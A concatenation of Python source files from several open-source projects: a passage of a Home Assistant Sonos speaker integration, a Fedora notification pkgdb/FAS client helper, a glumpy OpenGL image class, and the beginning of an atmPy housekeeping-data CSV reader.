self._share_link_plugin = None
if self._seen_timer:
self._seen_timer()
self._seen_timer = None
if self._poll_timer:
self._poll_timer()
self._poll_timer = None
await self.async_unsubscribe()
self.hass.data[DATA_SONOS].discovery_known.discard(self.soco.uid)
self.async_write_entity_states()
async def async_rebooted(self, soco: SoCo) -> None:
"""Handle a detected speaker reboot."""
_LOGGER.warning(
"%s rebooted or lost network connectivity, reconnecting with %s",
self.zone_name,
soco,
)
await self.async_unsubscribe()
self.soco = soco
await self.async_subscribe()
self._async_reset_seen_timer()
self.async_write_entity_states()
#
# Battery management
#
async def async_update_battery_info(self, battery_dict: dict[str, Any]) -> None:
"""Update battery info using the decoded SonosEvent."""
self._last_battery_event = dt_util.utcnow()
is_charging = EVENT_CHARGING[battery_dict["BattChg"]]
if not self._battery_poll_timer:
# Battery info received for an S1 speaker
new_battery = not self.battery_info
self.battery_info.update(
{
"Level": int(battery_dict["BattPct"]),
"PowerSource": "EXTERNAL" if is_charging else "BATTERY",
}
)
if new_battery:
_LOGGER.warning(
"S1 firmware detected on %s, battery info may update infrequently",
self.zone_name,
)
async_dispatcher_send(self.hass, SONOS_CREATE_BATTERY, self)
return
if is_charging == self.charging:
self.battery_info.update({"Level": int(battery_dict["BattPct"])})
else:
if battery_info := await self.hass.async_add_executor_job(
fetch_battery_info_or_none, self.soco
):
self.battery_info = battery_info
@property
def power_source(self) -> str | None:
"""Return the name of the current power source.
Observed to be either BATTERY or SONOS_CHARGING_RING or USB_POWER.
        May be None when battery_info is empty, as observed with an S1 Move.
"""
return self.battery_info.get("PowerSource")
@property
def charging(self) -> bool | None:
"""Return the charging status of the speaker."""
if self.power_source:
return self.power_source != "BATTERY"
return None
async def async_poll_battery(self, now: datetime.datetime | None = None) -> None:
"""Poll the device for the current battery state."""
if not self.available:
return
if (
self._last_battery_event
and dt_util.utcnow() - self._last_battery_event < BATTERY_SCAN_INTERVAL
):
return
if battery_info := await self.hass.async_add_executor_job(
fetch_battery_info_or_none, self.soco
):
self.battery_info = battery_info
self.async_write_entity_states()
#
# Group management
#
def update_groups(self) -> None:
"""Update group topology when polling."""
self.hass.add_job(self.create_update_groups_coro())
def update_group_for_uid(self, uid: str) -> None:
"""Update group topology if uid is missing."""
if uid not in self._group_members_missing:
return
missing_zone = self.hass.data[DATA_SONOS].discovered[uid].zone_name
_LOGGER.debug(
"%s was missing, adding to %s group", missing_zone, self.zone_name
)
self.update_groups()
@callback
def async_update_groups(self, event: SonosEvent) -> None:
"""Handle callback for topology change event."""
if not hasattr(event, "zone_player_uui_ds_in_group"):
return
self.hass.async_create_task(self.create_update_groups_coro(event))
def create_update_groups_coro(self, event: SonosEvent | None = None) -> Coroutine:
"""Handle callback for topology change event."""
def _get_soco_group() -> list[str]:
"""Ask SoCo cache for existing topology."""
coordinator_uid = self.soco.uid
slave_uids = []
with contextlib.suppress(OSError, SoCoException):
if self.soco.group and self.soco.group.coordinator:
coordinator_uid = self.soco.group.coordinator.uid
slave_uids = [
p.uid
for p in self.soco.group.members
if p.uid != coordinator_uid and p.is_visible
]
return [coordinator_uid] + slave_uids
async def _async_extract_group(event: SonosEvent | None) -> list[str]:
"""Extract group layout from a topology event."""
group = event and event.zone_player_uui_ds_in_group
if group:
assert isinstance(group, str)
return group.split(",")
return await self.hass.async_add_executor_job(_get_soco_group)
@callback
def _async_regroup(group: list[str]) -> None:
"""Rebuild internal group layout."""
if (
group == [self.soco.uid]
and self.sonos_group == [self]
and self.sonos_group_entities
):
# Skip updating existing single speakers in polling mode
return
entity_registry = ent_reg.async_get(self.hass)
sonos_group = []
sonos_group_entities = []
for uid in group:
speaker = self.hass.data[DATA_SONOS].discovered.get(uid)
if speaker:
self._group_members_missing.discard(uid)
sonos_group.append(speaker)
entity_id = entity_registry.async_get_entity_id(
MP_DOMAIN, DOMAIN, uid
)
sonos_group_entities.append(entity_id)
else:
self._group_members_missing.add(uid)
_LOGGER.debug(
"%s group member unavailable (%s), will try again",
self.zone_name,
uid,
)
if self.sonos_group_entities == sonos_group_entities:
# Useful in polling mode for speakers with stereo pairs or surrounds
# as those "invisible" speakers will bypass the single speaker check
return
self.coordinator = None
self.sonos_group = sonos_group
self.sonos_group_entities = sonos_group_entities
self.async_write_entity_states()
for slave_uid in group[1:]:
slave = self.hass.data[DATA_SONOS].discovered.get(slave_uid)
if slave:
slave.coordinator = self
slave.sonos_group = sonos_group
slave.sonos_group_entities = sonos_group_entities
slave.async_write_entity_states()
_LOGGER.debug("Regrouped %s: %s", self.zone_name, self.sonos_group_entities)
async def _async_handle_group_event(event: SonosEvent | None) -> None:
"""Get async lock and handle event."""
async with self.hass.data[DATA_SONOS].topology_condition:
group = await _async_extract_group(event)
if self.soco.uid == group[0]:
_async_regroup(group)
self.hass.data[DATA_SONOS].topology_condition.notify_all()
return _async_handle_group_event(event)
@soco_error()
def join(self, slaves: list[SonosSpeaker]) -> list[SonosSpeaker]:
"""Form a group with other players."""
if self.coordinator:
self.unjoin()
group = [self]
else:
group = self.sonos_group.copy()
for slave in slaves:
if slave.soco.uid != self.soco.uid:
slave.soco.join(self.soco)
slave.coordinator = self
if slave not in group:
group.append(slave)
return group
@staticmethod
async def join_multi(
hass: HomeAssistant,
master: SonosSpeaker,
speakers: list[SonosSpeaker],
) -> None:
"""Form a group with other players."""
async with hass.data[DATA_SONOS].topology_condition:
group: list[SonosSpeaker] = await hass.async_add_executor_job(
master.join, speakers
)
await SonosSpeaker.wait_for_groups(hass, [group])
@soco_error()
def unjoin(self) -> None:
"""Unjoin the player from a group."""
self.soco.unjoin()
self.coordinator = None
@staticmethod
async def unjoin_multi(hass: HomeAssistant, speakers: list[SonosSpeaker]) -> None:
"""Unjoin several players from their group."""
def _unjoin_all(speakers: list[SonosSpeaker]) -> None:
"""Sync helper."""
# Unjoin slaves first to prevent inheritance of queues
coordinators = [s for s in speakers if s.is_coordinator]
slaves = [s for s in speakers if not s.is_coordinator]
for speaker in slaves + coordinators:
speaker.unjoin()
async with hass.data[DATA_SONOS].topology_condition:
await hass.async_add_executor_job(_unjoin_all, speakers)
await SonosSpeaker.wait_for_groups(hass, [[s] for s in speakers])
@soco_error()
def snapshot(self, with_group: bool) -> None:
"""Snapshot the state of a player."""
self.soco_snapshot = Snapshot(self.soco)
self.soco_snapshot.snapshot()
if with_group:
self.snapshot_group = self.sonos_group.copy()
else:
self.snapshot_group = None
@staticmethod
async def snapshot_multi(
hass: HomeAssistant, speakers: list[SonosSpeaker], with_group: bool
) -> None:
"""Snapshot all the speakers and optionally their groups."""
def _snapshot_all(speakers: list[SonosSpeaker]) -> None:
"""Sync helper."""
for speaker in speakers:
speaker.snapshot(with_group)
# Find all affected players
speakers_set = set(speakers)
if with_group:
for speaker in list(speakers_set):
speakers_set.update(speaker.sonos_group)
async with hass.data[DATA_SONOS].topology_condition:
await hass.async_add_executor_job(_snapshot_all, speakers_set)
@soco_error()
def restore(self) -> None:
"""Restore a snapshotted state to a player."""
try:
assert self.soco_snapshot is not None
self.soco_snapshot.restore()
except (TypeError, AssertionError, AttributeError, SoCoException) as ex:
# Can happen if restoring a coordinator onto a current slave
_LOGGER.warning("Error on restore %s: %s", self.zone_name, ex)
self.soco_snapshot = None
self.snapshot_group = None
@staticmethod
async def restore_multi(
hass: HomeAssistant, speakers: list[SonosSpeaker], with_group: bool
) -> None:
"""Restore snapshots for all the speakers."""
def _restore_groups(
speakers: set[SonosSpeaker], with_group: bool
) -> list[list[SonosSpeaker]]:
"""Pause all current coordinators and restore groups."""
for speaker in (s for s in speakers if s.is_coordinator):
if (
speaker.media.playback_status == SONOS_STATE_PLAYING
and "Pause" in speaker.soco.available_actions
):
try:
speaker.soco.pause()
except SoCoUPnPException as exc:
_LOGGER.debug(
"Pause failed during restore of %s: %s",
speaker.zone_name,
speaker.soco.available_actions,
exc_info=exc,
)
groups = []
if not with_group:
return groups
# Unjoin non-coordinator speakers not contained in the desired snapshot group
#
# If a coordinator is unjoined from its group, another speaker from the group
# will inherit the coordinator's playqueue and its own playqueue will be lost
speakers_to_unjoin = set()
for speaker in speakers:
if speaker.sonos_group == speaker.snapshot_group:
continue
speakers_to_unjoin.update(
{
s
for s in speaker.sonos_group[1:]
if s not in speaker.snapshot_group
}
)
for speaker in speakers_to_unjoin:
speaker.unjoin()
# Bring back the original group topology
for speaker in (s for s in speakers if s.snapshot_group):
assert speaker.snapshot_group is not None
if speaker.snapshot_group[0] == speaker:
if speaker.snapshot_group not in (speaker.sonos_group, [speaker]):
speaker.join(speaker.snapshot_group)
groups.append(speaker.snapshot_group.copy())
return groups
def _restore_players(speakers: list[SonosSpeaker]) -> None:
"""Restore state of all players."""
for speaker in (s for s in speakers if not s.is_coordinator):
speaker.restore()
for speaker in (s for s in speakers if s.is_coordinator):
speaker.restore()
# Find all affected players
speakers_set = {s for s in speakers if s.soco_snapshot}
if missing_snapshots := set(speakers) - speakers_set:
raise HomeAssistantError(
f"Restore failed, speakers are missing snapshots: {[s.zone_name for s in missing_snapshots]}"
)
if with_group:
for speaker in [s for s in speakers_set if s.snapshot_group]:
assert speaker.snapshot_group is not None
speakers_set.update(speaker.snapshot_group)
async with hass.data[DATA_SONOS].topology_condition:
groups = await hass.async_add_executor_job(
_restore_groups, speakers_set, with_group
)
await SonosSpeaker.wait_for_groups(hass, groups)
await hass.async_add_executor_job(_restore_players, speakers_set)
@staticmethod
async def wait_for_groups(
hass: HomeAssistant, groups: list[list[SonosSpeaker]]
) -> None:
"""Wait until all groups are present, or timeout."""
def _test_groups(groups: list[list[SonosSpeaker]]) -> bool:
"""Return whether all groups exist now."""
for group in groups:
coordinator = group[0]
# Test that coordinator is coordinating
current_group = coordinator.sonos_group
if coordinator != current_group[0]:
return False
# Test that slaves match
if set(group[1:]) != set(current_group[1:]):
return False
return True
try:
with async_timeout.timeout(5):
while not _test_groups(groups):
await hass.data[DATA_SONOS].topology_condition.wait()
except asyncio.TimeoutError:
_LOGGER.warning("Timeout waiting for target groups %s", groups)
for speaker in hass.data[DATA_SONOS].discovered.values():
speaker.soco._zgs_cache.clear() # pylint: disable=protected-access
#
# Media and playback state handlers
#
def update_volume(self) -> None:
"""Update information about current volume settings."""
self.volume = self.soco.volume
self.muted = self.soco.mute
self.night_mode = self.soco.night_mode
self.dialog_mode = self.soco.dialog_mode
self.bass_level = self.soco.bass
self.treble_level = self.soco.treble
try:
self.cross_fade = self.soco.cross_fade
except SoCoSlaveException:
pass
def update_media(self, event: SonosEvent | None = None) -> None:
"""Update information about currently playing media."""
variables = event and event.variables
if variables and "transport_state" in variables:
# If the transport has an error then transport_state will
# not be set
new_status = variables["transport_state"]
else:
transport_info = self.soco.get_current_transport_info()
new_status = transport_info["current_transport_state"]
# Ignore transitions, we should get the target state soon
if new_status == SONOS_STATE_TRANSITIONING:
return
self.media.clear()
update_position = new_status != self.media.playback_status
self.media.playback_status = new_status
if variables and "transport_state" in variables:
self.media.play_mode = variables["current_play_mode"]
track_uri = (
variables["enqueued_transport_uri"] or variables["current_track_uri"]
)
music_source = self.soco.music_source_from_uri(track_uri)
if uri_meta_data := variables.get("enqueued_transport_uri_meta_data"):
if isinstance(uri_meta_data, DidlPlaylistContainer):
self.media.playlist_name = uri_meta_data.title
else:
self.media.play_mode = self.soco.play_mode
music_source = self.soco.music_source
if music_source == MUSIC_SRC_TV:
self.update_media_linein(SOURCE_TV)
elif music_source == MUSIC_SRC_LINE_IN:
self.update_media_linein(SOURCE_LINEIN)
else:
track_info = self.soco.get_current_track_info()
if not track_info["uri"]:
self.media.clear_position()
else:
self.media.uri = track_info["uri"]
self.media.artist = track_info.get("artist")
self.media.album_name = track_info.get("album")
self.media.title = track_info.get("title")
if music_source == MUSIC_SRC_RADIO:
self.update_media_radio(variables)
else:
self.update_media_music(track_info)
self.update_media_position(update_position, track_info)
self.write_entity_states()
# Also update slaves
speakers = self.hass.data[DATA_SONOS].discovered.values()
for speaker in speakers:
if speaker.coordinator == self:
speaker.write_entity_states()
def update_media_linein(self, source: str) -> None:
"""Update state when playing from line-in/tv."""
self.media.clear_position()
self.media.title = source
self.media.source_name = source
def update_media_radio(self, variables: dict | None) -> None:
"""Update state when streaming radio."""
self.media.clear_position()
radio_title = None
if current_track_metadata := variables.get("current_track_meta_data"):
if album_art_uri := getattr(current_track_metadata, "album_art_uri", None):
self.media.image_url = self.media.library.build_album_art_full_uri(
album_art_uri
)
if not self.media.artist:
self.media.artist = getattr(current_track_metadata, "creator", None)
# A missing artist implies metadata is incomplete, try a different method
if not self.media.artist:
radio_show = None
stream_content = None
if current_track_metadata.radio_show:
radio_show = current_track_metadata.radio_show.split(",")[0]
if not current_track_metadata.stream_content.startswith(
("ZPSTR_", "TYPE=")
):
stream_content = current_track_metadata.stream_content
radio_title = " • ".join(filter(None, [radio_show, stream_content]))
if radio_title:
# Prefer the radio title created above
self.media.title = radio_title
elif uri_meta_data := variables.get("enqueued_transport_uri_meta_data"):
if isinstance(uri_meta_data, DidlAudioBroadcast) and (
self.soco.music_source_from_uri(self.media.title) == MUSIC_SRC_RADIO
or (
isinstance(self.media.title, str)
and isinstance(self.media.uri, str)
and (
self.media.title in self.media.uri
or self.media.title in urllib.parse.unquote(self.media.uri)
)
)
):
# Fall back to the radio channel name as a last resort
self.media.title = uri_meta_data.title
media_info = self.soco.get_current_media_info()
self.media.channel = media_info["channel"]
# Check if currently playing radio station is in favorites
fav = next(
(
fav
for fav in self.favorites
if fav.reference.get_uri() == media_info["uri"]
),
None,
)
if fav:
self.media.source_name = fav.title
def update_media_music(self, track_info: dict) -> None:
"""Update state when playing music tracks."""
self.media.image_url = track_info.get("album_art")
playlist_position = int(track_info.get("playlist_position")) # type: ignore
if playlist_position > 0:
self.media.queue_position = playlist_position - 1
def update_media_position(
self, update_media_position: bool, track_info: dict
) -> None:
"""Update state when playing music tracks."""
self.media.duration = _timespan_secs(track_info.get("duration"))
current_position = _timespan_secs(track_info.get("position"))
if self.media.duration == 0:
self.media.clear_position()
return
# player started reporting position?
if current_position is not None and self.media.position is None:
update_media_position = True
# position jumped?
if current_position is not None and self.media.position is not None:
if self.media.playback_status == SONOS_STATE_PLAYING:
assert self.media.position_updated_at is not None
time_delta = dt_util.utcnow() - self.media.position_updated_at
time_diff = time_delta.total_seconds()
else:
time_diff = 0
calculated_position = self.media.position + time_diff
if abs(calculated_position - current_position) > 1.5:
update_media_position = True
if current_position is None:
self.media.clear_position()
elif update_media_position:
self.media.position = current_position
self.media.position_updated_at = dt_util.utcnow()
| aronsky/home-assistant | homeassistant/components/sonos/speaker.py | Python | apache-2.0 | 43,630 |
""" Fedora Notifications pkgdb client """
import logging
import time
import requests
import requests.exceptions
import fedmsg.meta
from dogpile.cache import make_region
from fedora.client.fas2 import AccountSystem
log = logging.getLogger(__name__)
try:
import re2 as re
except ImportError:
log.warning("Couldn't import the 're2' module.")
import re
# We cache fancy stuff here from pkgdb, etc.. stuff that we want to expire.
_cache = make_region()
_FAS = None
# This doesn't need any expiration. Cache forever.
# We do this because the compilation step for python-re2 is 16x slower than
# stdlib, but the match is 10x faster. So, cache the slow part once and use
# the fast part at the tightest part of the loop.
_regex_cache = {}
def compile_regex(pattern):
    if pattern not in _regex_cache:
# This is expensive with python-re2, so we cache it. Forever.
_regex_cache[pattern] = re.compile(pattern)
return _regex_cache[pattern]
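# --- Hypothetical usage sketch (not part of the original module) -------------
# Illustrates why the cache is kept forever: a second call with the same
# pattern returns the very same compiled object, so the slow re2 compilation
# happens only once per pattern. The topic pattern below is just an example.
def _example_compile_regex_usage():
    first = compile_regex(r'^org\.fedoraproject\.prod\.')
    second = compile_regex(r'^org\.fedoraproject\.prod\.')
    assert first is second  # served from _regex_cache on the second call
    return bool(first.match('org.fedoraproject.prod.git.receive'))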
def get_fas(config):
""" Return a fedora.client.fas2.AccountSystem object if the provided
configuration contains a FAS username and password.
"""
global _FAS
if _FAS is not None:
return _FAS
# In some development environments, having fas_credentials around is a
# pain.. so, let things proceed here, but emit a warning.
try:
creds = config['fas_credentials']
except KeyError:
log.warn("No fas_credentials available. Unable to query FAS.")
return None
default_url = 'https://admin.fedoraproject.org/accounts/'
_FAS = AccountSystem(
creds.get('base_url', default_url),
username=creds['username'],
password=creds['password'],
cache_session=False,
insecure=creds.get('insecure', False)
)
return _FAS
def get_packagers_of_package(config, package):
""" Retrieve the list of users who have commit on a package.
:arg config: a dict containing the fedmsg config
:arg package: the package you are interested in.
:return: a set listing all the fas usernames that have some ACL on package.
"""
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = cache_key_generator(get_packagers_of_package, package)
creator = lambda: _get_pkgdb2_packagers_for(config, package)
return _cache.get_or_create(key, creator)
def _get_pkgdb2_packagers_for(config, package):
log.debug("Requesting pkgdb2 packagers of package %r" % package)
default = 'https://admin.fedoraproject.org/pkgdb/api'
base = config.get('fmn.rules.utils.pkgdb_url', default)
url = '{0}/package/{1}'.format(base, package)
log.info("hitting url: %r" % url)
req = requests.get(url)
    if req.status_code != 200:
log.debug('URL %s returned code %s', req.url, req.status_code)
return set()
data = req.json()
    if not data['packages'] or 'acls' not in data['packages'][0]:
return set()
obj = data['packages'][0]
packagers = set([
acl['fas_name'] for acl in obj['acls']
if acl['status'] == 'Approved'])
groups = set([
acl['fas_name'].replace('group::', '')
for acl in obj['acls'] if (
acl['status'] == 'Approved' and
acl['fas_name'].startswith('group::'))
])
if groups:
fas = get_fas(config)
for group in groups:
packagers.update(get_user_of_group(config, fas, group))
return packagers
def get_packages_of_user(config, username, flags):
""" Retrieve the list of packages where the specified user some acl.
:arg config: a dict containing the fedmsg config
:arg username: the fas username of the packager whose packages are of
interest.
:return: a set listing all the packages where the specified user has
some ACL.
"""
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
packages = []
groups = get_groups_of_user(config, get_fas(config), username)
owners = [username] + ['group::' + group for group in groups]
for owner in owners:
key = cache_key_generator(get_packages_of_user, owner)
creator = lambda: _get_pkgdb2_packages_for(config, owner, flags)
subset = _cache.get_or_create(key, creator)
packages.extend(subset)
return set(packages)
def cache_key_generator(fn, arg):
return "|".join([fn.__module__, fn.__name__, arg]).encode('utf-8')
def invalidate_cache_for(config, fn, arg):
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = cache_key_generator(fn, arg)
return _cache.delete(key)
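# --- Hypothetical usage sketch (not part of the original module) -------------
# Shows the key layout used by the dogpile cache and how a stale entry for one
# package would be dropped. `config` is assumed to carry the usual
# 'fmn.rules.cache' settings and 'kernel' is just an example package name.
def _example_invalidate_package_cache(config, package='kernel'):
    key = cache_key_generator(get_packagers_of_package, package)
    # key looks like 'fmn.rules.utils|get_packagers_of_package|kernel'
    invalidate_cache_for(config, get_packagers_of_package, package)
    return key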
def _get_pkgdb2_packages_for(config, username, flags):
log.debug("Requesting pkgdb2 packages for user %r" % username)
start = time.time()
default = 'https://admin.fedoraproject.org/pkgdb/api'
base = config.get('fmn.rules.utils.pkgdb_url', default)
url = '{0}/packager/package/{1}'.format(base, username)
log.info("hitting url: %r" % url)
req = requests.get(url)
    if req.status_code != 200:
log.debug('URL %s returned code %s', req.url, req.status_code)
return set()
data = req.json()
packages_of_interest = sum([data[flag] for flag in flags], [])
packages_of_interest = set([p['name'] for p in packages_of_interest])
log.debug("done talking with pkgdb2 for now. %0.2fs", time.time() - start)
return packages_of_interest
def get_user_of_group(config, fas, groupname):
''' Return the list of users in the specified group.
:arg config: a dict containing the fedmsg config
    :arg fas: a fedora.client.fas2.AccountSystem object instantiated and logged
        into FAS.
:arg groupname: the name of the group for which we want to retrieve the
members.
:return: a list of FAS user members of the specified group.
'''
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = cache_key_generator(get_user_of_group, groupname)
def creator():
if not fas:
return set()
return set([u.username for u in fas.group_members(groupname)])
return _cache.get_or_create(key, creator)
def get_groups_of_user(config, fas, username):
''' Return the list of (pkgdb) groups to which the user belongs.
:arg config: a dict containing the fedmsg config
    :arg fas: a fedora.client.fas2.AccountSystem object instantiated and logged
        into FAS.
:arg username: the name of a user for which we want to retrieve groups
:return: a list of FAS groups to which the user belongs.
'''
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = cache_key_generator(get_groups_of_user, username)
def creator():
if not fas:
return []
results = []
for group in fas.person_by_username(username).get('memberships', []):
if group['group_type'] == 'pkgdb':
results.append(group.name)
return results
return _cache.get_or_create(key, creator)
def msg2usernames(msg, **config):
''' Return cached fedmsg.meta.msg2usernames(...) '''
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = "|".join(['usernames', msg['msg_id']]).encode('utf-8')
creator = lambda: fedmsg.meta.msg2usernames(msg, **config)
return _cache.get_or_create(key, creator)
def msg2packages(msg, **config):
''' Return cached fedmsg.meta.msg2packages(...) '''
if not _cache.is_configured:
_cache.configure(**config['fmn.rules.cache'])
key = "|".join(['packages', msg['msg_id']]).encode('utf-8')
creator = lambda: fedmsg.meta.msg2packages(msg, **config)
return _cache.get_or_create(key, creator)
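# --- Hypothetical usage sketch (not part of the original module) -------------
# Both wrappers above memoize on the fedmsg `msg_id`, so evaluating many rules
# against the same message only hits fedmsg.meta once per helper. A real call
# requires fedmsg.meta.make_processors(**config) to have been run and `msg` to
# be a genuine fedmsg message dictionary.
def _example_cached_msg_lookups(msg, config):
    users = msg2usernames(msg, **config)        # computed, then cached
    users_again = msg2usernames(msg, **config)  # served from the dogpile cache
    packages = msg2packages(msg, **config)
    return users, users_again, packages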
| jeremycline/fmn | fmn/rules/utils.py | Python | lgpl-2.1 | 7,808 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (C) 2009-2010 Nicolas P. Rougier
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
import numpy as np
import OpenGL.GL as gl
import texture, shader, colormap, color
class Image(object):
    ''' Colormapped image built from a numpy array and rendered as an OpenGL texture. '''
def __init__(self, Z, format=None, cmap=colormap.IceAndFire, vmin=None, vmax=None,
interpolation='nearest', origin='lower', lighted=False,
gridsize=(0.0,0.0,0.0), elevation = 0.0):
''' Creates a texture from numpy array.
Parameters:
-----------
Z : numpy array
Z may be a float32 or uint8 array with following shapes:
* M
* MxN
* MxNx[1,2,3,4]
format: [None | 'A' | 'LA' | 'RGB' | 'RGBA']
        Specify the texture format to use. Most of the time it is possible to
        find it automatically, but there are a few cases where it is not
        possible to decide. For example, an array with shape (M,3) can be
considered as 2D alpha texture of size (M,3) or a 1D RGB texture of
size (M,).
interpolation: 'nearest', 'bilinear' or 'bicubic'
Interpolation method.
vmin: scalar
Minimal representable value.
vmax: scalar
Maximal representable value.
origin: 'lower' or 'upper'
Place the [0,0] index of the array in the upper left or lower left
corner.
'''
self._lut = None
self._interpolation = interpolation
self._lighted = lighted
self._gridsize = gridsize
self._elevation = elevation
self._texture = texture.Texture(Z)
self._origin = origin
self._vmin = vmin
self._vmax = vmax
self._data = Z
self.cmap = cmap # This takes care of actual build
self._shader = None
self.build()
def build(self):
''' Build shader '''
interpolation = self._interpolation
gridsize = self._gridsize
elevation = self._elevation
lighted = self._lighted
cmap = self._cmap
self._shader = None
# Source format is RGB or RGBA, no need of a colormap
if self._texture.src_format in [gl.GL_RGB,gl.GL_RGBA]:
if interpolation == 'bicubic':
self._shader = shader.Bicubic(False, lighted=lighted, gridsize=gridsize, elevation=elevation)
elif interpolation == 'bilinear':
self._shader = shader.Bilinear(False, lighted=lighted, gridsize=gridsize, elevation=elevation)
else:
self._shader = None
# Source format is not RGB or RGBA
else:
if cmap:
if interpolation == 'bicubic':
self._shader = shader.Bicubic(True, lighted=lighted, gridsize=gridsize, elevation=elevation)
elif interpolation == 'bilinear':
self._shader = shader.Bilinear(True, lighted=lighted, gridsize=gridsize, elevation=elevation)
else:
self._shader = shader.Nearest(True, lighted=lighted, gridsize=gridsize, elevation=elevation)
else:
if interpolation == 'bicubic':
self._shader = shader.Bicubic(False, lighted=lighted, gridsize=gridsize, elevation=elevation)
elif interpolation == 'bilinear':
self._shader = shader.Bilinear(False, lighted=lighted, gridsize=gridsize, elevation=elevation)
else:
self._shader = None
self.update()
@property
def shape(self):
''' Underlying array shape. '''
return self._data.shape
@property
def data(self):
''' Underlying array '''
return self._data
@property
def texture(self):
''' Underlying texture '''
return self._texture
@property
def shader(self):
''' Currently active shader '''
return self._shader
@property
def format(self):
''' Array representation format (string). '''
format = self._texture.src_format
if format == gl.GL_ALPHA:
return 'A'
elif format == gl.GL_LUMINANCE_ALPHA:
return 'LA'
elif format == gl.GL_RGB:
return 'RGB'
elif format == gl.GL_RGBA:
return 'RGBA'
def _get_cmap(self):
return self._cmap
def _set_cmap(self, cmap):
self._cmap = cmap
colors = self.cmap.LUT['rgb'][1:].flatten().view((np.float32,3))
self._lut = texture.Texture(colors)
cmap = property(_get_cmap, _set_cmap,
doc=''' Colormap to be used to represent the array. ''')
def _get_elevation(self):
return self._elevation
def _set_elevation(self, elevation):
# Do we need to re-build shader ?
if not (elevation*self._elevation):
self._elevation = elevation
self.build()
elif self._shader:
self._elevation = elevation
self._shader._elevation = elevation
elevation = property(_get_elevation, _set_elevation,
doc=''' Image elevation. ''')
def _get_origin(self):
return self._origin
def _set_origin(self, origin):
self._origin = origin
origin = property(_get_origin, _set_origin,
doc=''' Place the [0,0] index of the array in the upper
left or lower left corner. ''')
def _get_lighted(self):
return self._lighted
def _set_lighted(self, lighted):
self._lighted = lighted
self.build()
lighted = property(_get_lighted, _set_lighted,
                       doc=''' Indicate whether the image is lighted. ''')
def _get_interpolation(self):
return self._interpolation
def _set_interpolation(self, interpolation):
self._interpolation = interpolation
self.build()
interpolation = property(_get_interpolation, _set_interpolation,
doc=''' Interpolation method. ''')
def _get_vmin(self):
return self._vmin
def _set_vmin(self, vmin):
self._vmin = vmin
vmin = property(_get_vmin, _set_vmin,
doc=''' Minimal representable value. ''')
def _get_vmax(self):
return self._vmax
def _set_vmax(self, vmax):
self._vmax = vmax
vmax = property(_get_vmax, _set_vmax,
doc=''' Maximal representable value. ''')
def _get_gridsize(self):
return self._gridsize
def _get_gridsize_x(self):
return self._gridsize[0]
def _get_gridsize_y(self):
return self._gridsize[1]
def _get_gridsize_z(self):
return self._gridsize[2]
def _set_gridsize(self, gridsize):
# Do we need to re-build shader ?
x,y,z = gridsize
x,y,z = max(0,x),max(0,y),max(0,z)
_x,_y,_z = self._gridsize
self._gridsize = x,y,z
if not (x+y+z)*(_x+_y+_z) and (x+y+z)+(_x+_y+_z):
self.build()
elif self._shader:
self._shader._gridsize = x,y,z
def _set_gridsize_x(self, x):
self.gridsize = (max(0,x), self._gridsize[1], self._gridsize[2])
def _set_gridsize_y(self, y):
self.gridsize = (self._gridsize[0], max(0,y), self._gridsize[2])
def _set_gridsize_z(self, z):
self.gridsize = (self._gridsize[0], self._gridsize[1], max(0,z))
gridsize = property(_get_gridsize, _set_gridsize,
doc=''' Image grid (x,y,z). ''')
def update(self):
''' Data update. '''
if self.vmin is None:
vmin = self.data.min()
else:
vmin = self.vmin
if self.vmax is None:
vmax = self._data.max()
else:
vmax = self.vmax
if vmin == vmax:
vmin, vmax = 0, 1
if self._lut:
s = self._lut.width
self._texture.update(bias = 1.0/(s-1)-vmin*((s-3.1)/(s-1))/(vmax-vmin),
scale = ((s-3.1)/(s-1))/(vmax-vmin))
else:
self._texture.update(bias=-vmin/(vmax-vmin),scale=1.0/(vmax-vmin))
def blit(self, x, y, w, h):
''' Blit array onto active framebuffer. '''
if self._shader:
self._shader.bind(self.texture,self._lut)
if self.origin == 'lower':
t=0,1
else:
t=1,0
gl.glColor(1,1,1,1)
self._texture.blit(x,y,w,h,t=t)
if self._shader:
self._shader.unbind()
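# --- Hypothetical usage sketch (not part of the original module) -------------
# Assumes an OpenGL context is already current (for example one created by a
# glumpy window). A random float32 array is mapped through the IceAndFire
# colormap and blitted onto the active framebuffer.
def _example_blit_random_image(x=0, y=0, w=512, h=512):
    Z = np.random.uniform(0, 1, (256, 256)).astype(np.float32)
    img = Image(Z, cmap=colormap.IceAndFire, interpolation='bilinear',
                vmin=0.0, vmax=1.0, origin='lower')
    img.blit(x, y, w, h)
    return img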
| davidcox/glumpy | glumpy/image.py | Python | bsd-3-clause | 8,858 |
import pandas as pd
# from atmPy.tools import thermodynamics
from atmPy.atmos import timeseries
import numpy as np
from atmPy.aerosols import sampling_efficiency as sampeff
from atmPy.tools import pandas_tools
_date_time_alts = ['uas_datetime']
_pressure_alt = ['StaticP', 'PRESS']
_temp_alt = ['AT_cont', 'AT']
_RH_alt = ['RH_cont', 'RH']
def read_csv(fname, temperature_limits=(-20, -0.5)):
"""
Arguments
---------
    temperature_limits: tuple
        The temperature reading contains false values which can cause problems later."""
df = pd.read_csv(fname, sep='\t')
pandas_tools.ensure_column_exists(df,'DateTime', _date_time_alts)
pandas_tools.ensure_column_exists(df,'Pressure_Pa', _pressure_alt)
pandas_tools.ensure_column_exists(df,'Temperature', _temp_alt)
pandas_tools.ensure_column_exists(df,'Relative_humidity', _RH_alt)
# return df
df.index = pd.Series(pd.to_datetime(df.DateTime, format='%Y-%m-%d %H:%M:%S'))
# df['Pressure_Pa'] = df.PRESS
# df['Temperature'] = df.AT
# df['Relative_humidity'] = df.RH
# df = df.drop('PRESS', axis=1)
# df = df.drop('AT', axis=1)
# df = df.drop('RH', axis=1)
df = df.drop('DateTime', axis=1)
df = df.sort_index()
if temperature_limits:
df = df[df.Temperature > temperature_limits[0]]
df = df[temperature_limits[1] > df.Temperature]
hk = timeseries.TimeSeries(df)
return hk
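# --- Hypothetical usage sketch (not part of the original module) -------------
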